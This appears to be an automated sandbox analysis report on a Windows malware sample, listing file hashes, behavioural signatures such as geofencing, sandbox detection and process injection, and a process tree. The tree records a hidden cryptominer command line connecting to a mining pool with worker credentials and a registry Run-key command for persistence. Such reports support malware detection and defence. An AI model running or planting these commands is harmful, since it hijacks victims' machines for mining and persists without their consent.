Analysis

max time kernel: 170s
max time network: 166s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 24-11-2022 21:47

Static task: static1

Behavioral task: behavioral1
Sample: 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe
Resource: win7-20220812-en

Behavioral task: behavioral2
Sample: 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe
Resource: win10v2004-20220812-en
General

Target: 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe
Size: 1.3MB
MD5: d08af005a79bb8e5f92e32b52874b722
SHA1: 7a95179e88f4a6ee33192f13dfc5c2b9d8274bc6
SHA256: 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4
SHA512: c8893b32215d4b1d57f0143cdc9d7b809fa2adba2fad6826bad52310da0ecc355a06d6b832830e757480bd2174a507ab51d97b7873860f0bbee4c5b296f433b1
SSDEEP: 24576:esabjkjys3jhmgWKU8tkYphKqK2B54cDW4EmolRCpSSup5Uixp2IQtHZq:esaPkp311Hf3KW1DW4iOSSuptv2d5
Malware Config
Signatures

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes: 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe
  Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation (process: 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe)
Uses the VBS compiler for execution (1 TTP)
Adds Run key to start application (2 TTPs, 2 IoCs)
Processes: reg.exe
  Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run (process: reg.exe)
  Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wcenter = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Wcenter82.exe" (process: reg.exe)
Suspicious use of SetThreadContext (1 IoC)
Processes: 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe
  PID 4760 set thread context of PID 1708: 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe -> vbc.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Checks processor information in registry (2 TTPs, 5 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: vbc.exe, 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (process: vbc.exe)
  Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor (process: 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe)
  Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor (process: 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe)
  Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (process: vbc.exe)
  Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (process: vbc.exe)
Suspicious behavior: EnumeratesProcesses (48 IoCs)
Processes: 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe
  PID 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe (48 identical entries)
Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes: 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe
  Token: SeDebugPrivilege, PID 4760 (process: 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe)
Suspicious use of WriteProcessMemory (17 IoCs)
Processes: 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe, cmd.exe
  PID 4760 wrote to memory of PID 1708: 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe -> vbc.exe (11 entries)
  PID 4760 wrote to memory of PID 1732: 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe -> cmd.exe (3 entries)
  PID 1732 wrote to memory of PID 212: cmd.exe -> reg.exe (3 entries)
Processes

C:\Users\Admin\AppData\Local\Temp\9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe (PID 4760)
  Command line: "C:\Users\Admin\AppData\Local\Temp\9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe"
  - Checks computer location settings
  - Suspicious use of SetThreadContext
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe (PID 1708)
    Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe -a scrypt -o stratum+tcp://hot.wemineltc.com:3334 -u lover83.raid -p lover123123 -T 83 -t 2 -g No
    - Checks processor information in registry

  C:\Windows\SysWOW64\cmd.exe (PID 1732)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Wcenter" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Wcenter82.exe
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\reg.exe (PID 212)
      Command line: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Wcenter" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Wcenter82.exe
      - Adds Run key to start application